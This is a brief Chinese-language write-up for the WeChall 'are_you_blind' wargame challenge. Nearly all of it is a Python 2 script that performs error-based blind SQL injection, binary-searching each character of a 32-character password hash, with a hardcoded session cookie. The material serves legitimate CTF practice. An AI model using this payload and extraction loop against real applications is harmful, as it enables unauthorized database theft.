http://www.wechall.net/challenge/Mawekl/are_you_blind/index.php
这道题还是盲注,32位的hash,128次跑完。这里我们用报错的方法来判断
下面是python代码
#!/usr/bin/env python2
import urllib
import urllib2
def makePayload(statement):
return "' or if(substring(password,%d,1)%s'%s',3,(select 1 union select 2))=3-- " % (statement[0], statement[1], statement[2])
def checkResponse(response):
return response.find("Database error") == -1
def doAssert(statement):
url = "http://www.wechall.net/challenge/Mawekl/are_you_blind/index.php"
values = {'injection':makePayload(statement),'inject':'Inject'}
data = urllib.urlencode(values)
req = urllib2.Request(url, data)
req.add_header('cookie','WC=7374566-11403-7iblKzppaCoukyl1')
response = urllib2.urlopen(req)
content = response.read()
return checkResponse(content)
if __name__ == "__main__":
alphalist = "0123456789ABCDEF"
result = []
for idx in range(1,33):
start = 0
end = 16 #[start, end)
while (start < end):
#print("[%d, %d)" % (start, end))
if (end - start == 1):
result.append(alphalist[start])
print alphalist[start]
break
else:
middle = (start + end)/2
if(doAssert([idx, '<', alphalist[middle]])):
end = middle
else:
start = middle
print ''.join(result)